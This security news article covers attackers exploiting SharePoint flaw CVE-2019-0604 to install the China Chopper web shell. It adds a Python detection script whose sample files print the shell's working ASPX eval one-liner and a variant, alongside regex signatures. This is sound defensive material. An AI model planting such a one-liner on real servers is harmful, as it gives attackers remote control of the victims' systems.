Web application security testing has revealed that threat actors are actively exploiting a remote code execution vulnerability in some versions of Microsoft SharePoint Server to install the web shell known as China Chopper. Although the vulnerability has already been patched, not all SharePoint deployments have been updated.
The vulnerability, tracked as CVE-2019-0604, affects all versions from SharePoint 2010 to SharePoint 2019. Microsoft corrected the flaw in February and released additional updates in March and April.
“After the web application security testing, we discovered that a hacker trying to exploit this vulnerability could execute arbitrary code in the SharePoint application pool,” the specialists said. According to reports, exploiting this vulnerability requires uploading a specially crafted SharePoint application package to a vulnerable server.
Once the vulnerability has been exploited, the threat actors deploy the web shell known as China Chopper to remotely access the compromised servers, send commands and manage files on the victims’ systems.
China Chopper allows attackers to upload and download any file on a compromised server, as well as edit, delete or rename any file, the web application security testing concluded.
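As an added example that is not part of the original article or the IICS researchers’ work, the following Python script shows one way to hunt for the China Chopper ASPX one-liner on a server that may have been compromised this way. The signatures are based on the publicly documented form of the shell, which evaluates an HTTP request parameter as server-side JScript; the sample file contents are constructed for the illustration, and the file names, parameter names and directory layout are assumptions rather than indicators from this campaign.

```python
import os
import re
from typing import Dict, List

# Constructed sample files standing in for ASPX pages found under a SharePoint
# web root. None of these come from the campaign described in the article.
SAMPLE_FILES: Dict[str, str] = {
    # Benign page: no server-side eval of request data.
    "default.aspx": (
        '<%@ Page Language="C#" %>\n'
        "<html><body><h1>Welcome to the intranet</h1></body></html>\n"
    ),
    # The publicly documented one-line ASPX form of China Chopper
    # (assumed file name and parameter name).
    "help.aspx": (
        '<%@ Page Language="Jscript"%>'
        '<%eval(Request.Item["password"],"unsafe");%>'
    ),
    # A spacing/parameter-name variant of the same construct (constructed).
    "error2.aspx": (
        '<%@ Page Language = "Jscript" %>\n'
        '<% eval( Request.Item["z0"] , "unsafe" ); %>\n'
    ),
}

# Patterns describing the shell's distinctive construct: JScript that
# evaluates an HTTP request parameter as code.
SIGNATURES = {
    # eval(Request.Item[...]) regardless of whitespace
    "eval_request_item": re.compile(
        r"eval\s*\(\s*Request\.Item\s*\[", re.IGNORECASE),
    # eval(<anything>, "unsafe") -- the flag that disables JScript safety checks
    "unsafe_eval": re.compile(
        r"eval\s*\([^)]*,\s*[\"']unsafe[\"']\s*\)", re.IGNORECASE),
    # Supporting evidence only: JScript page directive is rare on SharePoint
    "jscript_page_directive": re.compile(
        r'<%@\s*Page\s+Language\s*=\s*"Jscript"', re.IGNORECASE),
}

# Signatures that on their own justify flagging a file as a web shell.
STRONG_SIGNATURES = {"eval_request_item", "unsafe_eval"}


def scan_content(content: str) -> List[str]:
    """Return the names of all signatures that match the given file content."""
    return [name for name, rx in SIGNATURES.items() if rx.search(content)]


def scan_files(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan a mapping of file name -> content.

    Returns only the files whose matches include at least one strong
    signature, mapped to the full list of matched signature names.
    """
    flagged: Dict[str, List[str]] = {}
    for name, content in files.items():
        matches = scan_content(content)
        if STRONG_SIGNATURES.intersection(matches):
            flagged[name] = matches
    return flagged


def scan_directory(root: str,
                   extensions=(".aspx", ".ashx", ".asmx")) -> Dict[str, List[str]]:
    """Walk a real web root (e.g. the SharePoint LAYOUTS directory) and scan
    every file with a server-side script extension. Paths are assumptions."""
    files: Dict[str, str] = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(extensions):
                path = os.path.join(dirpath, fn)
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    files[path] = fh.read()
    return scan_files(files)


if __name__ == "__main__":
    # Run against the constructed samples; on a server, call scan_directory()
    # with the web root instead.
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(f"SUSPICIOUS {path}: {', '.join(hits)}")
```

A hit on `eval_request_item` or `unsafe_eval` is worth treating as a confirmed web shell until proven otherwise; the JScript page directive alone is only corroborating evidence. Because the shell is a one-liner, also look for recently created or modified script files under the web root whose timestamps do not line up with a patch or deployment window.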
The main targets of this SharePoint exploitation campaign are public sector institutions and universities, as well as the manufacturing and technology industries, say the specialists from the International Institute of Cyber Security (IICS).
Since no workarounds are known to mitigate this security issue, specialists recommend that system administrators install the server update to prevent exploitation of this vulnerability, making sure that the most recent of the February, March and April updates is applied rather than only the first fix.
Microsoft has announced that this year it will expand the scope and amounts of its vulnerability bounty program; the expansion is expected to cover services such as SharePoint, among other platforms developed by the company. Last year Microsoft paid more than $2M USD to security researchers for reporting various security flaws, some of them rated critical.